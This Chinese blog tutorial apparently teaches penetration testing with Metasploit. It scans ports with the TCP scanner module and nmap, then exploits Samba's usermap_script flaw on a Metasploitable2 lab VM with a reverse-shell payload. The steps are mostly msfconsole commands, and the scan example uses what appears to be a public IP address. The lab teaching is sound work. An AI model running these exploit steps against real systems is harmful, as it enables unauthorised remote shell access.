渗透之metasploit技术-端口扫描,漏洞利用

最新推荐文章于 2024-03-29 10:11:31 发布
最新推荐文章于 2024-03-29 10:11:31 发布
阅读量6.5k 收藏 36
点赞数 9
分类专栏: linux 渗透 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44255856/article/details/97900038
版权
渗透 同时被 3 个专栏收录
12 篇文章 0 订阅
订阅专栏
渗透测试
8 篇文章 0 订阅
订阅专栏
linux
2 篇文章 1 订阅
订阅专栏

一,使用主机模块进行端口扫描
启用metasploit msfconsole
在这里插入图片描述
检查有哪些可用端口。

search portscan

在这里插入图片描述
使用TCP扫描模块并检查有那些参数需要设置。

use [模板]
show options

在这里插入图片描述
设置待扫描的IP地址(RHOSTS),设置扫描的端口范围(PORTS),设置扫描的线程(THREADS),最后使用show options查看设置的参数。run,运行。

set RHOSTS [设置待扫描的IP地址]
set PORTS 1-500
set threads 20
show options

在这里插入图片描述
也可以使用unset取消某个参数。
这里取消的是ip地址,最后可看见开放了21端口。

unset rhosts
set rhosts 122.1.96.34
run

在这里插入图片描述
另外,还有两条命令,setg和unsetg。两者用于设置或者取消全局的参数值。
说明:metasploit也可以配合nmap使用。
重点:实战不要使用msf扫描,nmap是最佳选择。

渗透利用

此次模拟目标机是自我搭建的metasploitable2,攻击机为kali。

直接放入虚拟机种运行即可。
metasploitable2的默认账号密码都是msfadmin

在metasploitable2上查看ip。
在这里插入图片描述
kali上对目标ip进行扫描。

nmap -sV 192.168.102.134

在这里插入图片描述
从扫描结果中发现目标ip运行着Samba服务。

简介 Samba是一个能让Linux系统应用Microsoft网络通讯协议的软件,而SMB是Server Message Block的缩写,即为服务器消息块,SMB主要是作为Microsoft的网络通讯协议,后来Samba将SMB通信协议应用到了Linux系统上,就形成了现在的Samba软件。

在msf种搜索samba漏洞利用模块

search samba

在这里插入图片描述

发现漏洞利用模块exploit/multi/samba/usermap_script,rank是 excellent,是最好的,所以使用找个模块。

查看目标利用模块。

info exploit/multi/samba/usermap_script

在这里插入图片描述
使用漏洞利用模块并且查看可用于攻击的payload

use exploit/multi/samba/usermap_script 
show payloads

在这里插入图片描述
这里我们使用cmd/unix/reverse

set payload cmd/unix/reverse

在这里插入图片描述

  • 设置攻击的目标机的ip
  • 设置漏洞利用的端口号
  • 设置攻击机的主机ip
    在这里插入图片描述
    运行。在攻击成功后,可以看到目标机和攻击机之间建立了一个shell连接。
    在这里插入图片描述
「已注销」
关注
  • 9
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
E115-经典赛题-漏洞扫描与利用.pdf
12-02
E115-经典赛题-漏洞扫描与利用 ...本文档总结了漏洞扫描、操作系统版本信息分析、服务开放端口分析、Metasploit框架使用和漏洞利用等多方面的知识点,能够帮助读者更好地理解和掌握漏洞扫描与利用的技术
Metasploit 内网渗透二—— 实战渗透操作--感受渗透流程,具体做什么 -永恒之蓝漏洞
最新发布
天下著书立传者,皆为我师
04-24 1094
渗透测试实战练习1——永恒之蓝漏洞(渗透攻击 Win7 主机并远程执行命令)以及mysql空密码扫描利用(获取mysql数据库中信息)
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
热门推荐
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)_msf漏洞扫描
2201_75735270的博客
03-29 2233
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
metasploit扫描mysql端口_Kali linux 2016.2(Rolling)中metasploit端口扫描
weixin_31869917的博客
02-17 1122
目前常见的端口扫描技术一般有如下几类: TCP Connect、TCP SYN、TCP ACK、TCP FIN。Metasploit中的端口扫描Metasploit的辅助模块中提供了几款实用的端口扫描器。可以输入search portscan命令找到相关的端口扫描器。如下root@kali:~# msfconsole......msf>search portscanMatching Mo...
实验一:MSF渗透测试Smaba漏洞模块
weixin_45822468的博客
01-12 384
启动目标靶机 Metasploitable2 sudo virsh start Metasploitable2 # 测试目标靶机是否启动(可以使用 Ctrl-C 退出) ping target。# 启动并进入 Kali 容器里的 bash docker run -ti --network host 43bb9 bash。生成详细的扫描报告 在报告中搜索与smaba相关的目标信息(-i参数忽略大小写)namp -sv 扫描开放的服务以及服务的版本信息。namp -sS 隐蔽的端口扫描不易察觉。
windows扫描域内端口
有勇气的牛排博客
09-22 3986
通过查询目标主机的端口信息,可以了解主机所开放的服务,还可以找出开放服务的漏洞,分析目标网络的拓扑结构等。 1 利用telnet命令进行扫描 Telnet协议是TCP/IP协议族的一员,是Internet远程登录服务的标准协议和主要方式。他为用户提供了在本地计算机上完成远程主机工作的能力。 使用此命令可快速探测某台主机的某个常规高危段鸥是否开放。 1.1 开启telnet 1.2 常用命令 1.2.1 帮助 1.2.2 telnet测试端口 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下.
未授权访问漏洞总结
LuckySec
03-24 4742
前言:这篇文章主要收集一些常见的未授权访问漏洞。未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 0x01 未授权漏洞预览 Active MQ 未授权访问 Atlassian Crowd 未授权访问 CouchDB 未授权访问 Docker 未授权访问 Dubbo 未授权访问 Druid 未授权访问 Elasticsearch 未授权访问 FTP 未授权访问 Hadoop 未授权访问 JBoss 未授权访
metasploit渗透学习日记1-5
01-18
3. 漏洞分析:在这个阶段,利用扫描工具(如Nmap)对目标系统进行端口扫描和漏洞扫描,分析哪些漏洞可以被利用,以制定攻击策略。 4. 渗透攻击:选择最佳的渗透攻击方式,使用Metasploit框架中的Exploit模块来利用...
利用win系统ms08-067漏洞.docx
10-26
利用Win系统MS08-067漏洞 MS08-067漏洞是Windows操作系统中一个严重的漏洞,它允许攻击者在无需身份验证的情况下远程执行代码。该漏洞于2008年10月โดยMicrosoft发布了补丁,但直到现在仍然有很多系统没有打补丁...
metasploit常用渗透命令[文].pdf
10-11
Metasploit是一款强大的安全测试工具,广泛用于渗透测试和漏洞利用。它包含了大量的漏洞利用模块、探测器、后渗透工具,以及一个交互式的控制台环境。以下是一些关于Metasploit常用渗透命令的详细解释: 1. **升级...
PortScan(局域网ip搜索)
04-17
本工具是用来搜索指定网段,局域网内存在的地址,纯净版无广告。
E023-渗透测试常用工具-使用Armitage的MSF进行自动化集成渗透测试.pdf
12-02
总的来说,本课程通过实际操作展示了如何利用Armitage和MSF进行自动化渗透测试,包括网络侦查、漏洞扫描、目标定位以及选择合适的攻击模块。这对于网络安全专业人员来说是一项至关重要的技能,能有效提升评估和保护...
常见端口漏洞利用
sweetie 的博客
03-05 3289
常见端口漏洞利用 快速扫描:Masscan -p80,800 ip --rate=10000    21/ FTP 匿名/暴力破解   拒绝服务 22/ SSH 暴力破解 23/ telnet Winbox(cve-2018-14847) 161/ snmp 弱口令   https://blog.csdn.net/archersaber39/article/details/78932252 389/ ladp 匿名访问   https://www.cnblogs.com/persuit/p/5706432.
6-15漏洞利用-smb-RCE远程命令执行
山兔的博客
07-22 861
Samba是在Linux和UNIX系统上实现SMB文件共享协议的一个免费软件,由服务器及客户端程序构成。SMB(ServerMessageBlock,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。一般运行在139、445端口。如果目标开启了445,应该是开启了支持smb协议的一个软件,139也是它的一个证明。...
MSF进行端口扫描
Ethan024的博客
05-09 1869
查看MSF框架中提供的端口扫描工具: msf6 > search portscan 使用MSF中SYN端口扫描器对主机进行一次简单的扫描: msf6 > use auxiliary/scanner/portscan/syn msf6 auxiliary(scanner/portscan/syn) > set rhosts 192.168.168.228 msf6 auxiliary(scanner/portscan/syn) > set threads 50 msf6 auxil.
基于端口的信息探测-portscan-1.0
weixin_34198583的博客
06-06 287
http://www.tiaozhanziwo.com/archives/174.html
metasploit端口扫描
Culprit的博客
02-28 1137
1.search portscanack:通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测。ftpbounce: 通过FTP bounce攻击的原理对TCP服务进行枚举,一些新的FTP服务器软件能够很好的防范FTP bounce攻击,但在一些旧的Solaris 及FreeBSD 系统的FTP服务中此类攻击方式仍能够被利用。syn:使用发送TCP SYN标志的方式探测开放的端口。tcp: 通过一...
Metaspioit 端口扫描
qq_38611079的博客
09-19 769
一,使用NMAP扫描 打开metasploits:msfconsole   使用nmap进行端口扫描:nmap -v -sV 172.47.16.66 二,使用扫描工具扫描 查看端口扫描器有哪些  :search portscan 调用端口扫描器:use auxiliary/scanner/portscan/tcp 打开工具显示菜单:show options ...
80端口漏洞利用kali
04-02
80端口是HTTP协议默认使用的端口,常用于Web服务器。Kali Linux是一款专门用于渗透测试和网络安全的操作系统。在Kali Linux中,有一些工具可以用于检测和利用80端口的漏洞。 其中一个常用的工具是Metasploit Framework,它是一款功能强大的渗透测试工具。Metasploit Framework提供了多个模块,可以用于检测和利用各种漏洞,包括80端口的漏洞。 要利用80端口的漏洞,首先需要进行漏洞扫描,以确定目标系统是否存在漏洞。可以使用Metasploit Framework中的模块进行扫描,例如使用http_version模块来检测目标系统的HTTP版本,或使用http_put模块来检测目标系统是否允许HTTP PUT方法。 如果发现目标系统存在漏洞,可以使用Metasploit Framework中相应的模块进行利用。例如,使用exploit/multi/http/apache_mod_cgi_bash_env_exec模块来利用Apache mod_cgi漏洞,或使用exploit/multi/http/php_cgi_arg_injection模块来利用PHP CGI漏洞。 需要注意的是,利用漏洞是一项高风险的行为,应该在合法授权和合规的情况下进行。未经授权的渗透测试是违行为,可能导致法律责任。在进行渗透时,请确保遵守相关法律法规和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值